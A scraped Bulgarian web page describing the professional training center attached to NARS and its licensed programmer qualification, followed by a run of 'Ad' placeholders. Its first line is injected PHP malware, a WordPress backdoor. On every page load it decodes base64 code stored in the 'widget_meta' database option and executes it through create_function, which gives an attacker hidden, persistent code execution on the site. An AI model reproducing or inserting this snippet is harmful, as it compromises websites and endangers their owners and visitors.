add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); ЦПО към НАРС - НАРС

Център за Професионално Обучение /ЦПО/ към НАРС

Центърът за професионално обучение към „НАРС” е лицензиран от “Национална агенция за професионално образование и обучение” /НАПОО/ към Министерски съвет.

Центърът е специализиран в обученията в областта на информационните технологии и програмирането.

Лицензия № 200512298

Предлагани професии, специалности:

1. Професия “Програмист” код 481010
1.1. Специалност “Програмно осигуряване”, код 4810101 – втора степен на професионална квалификация.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad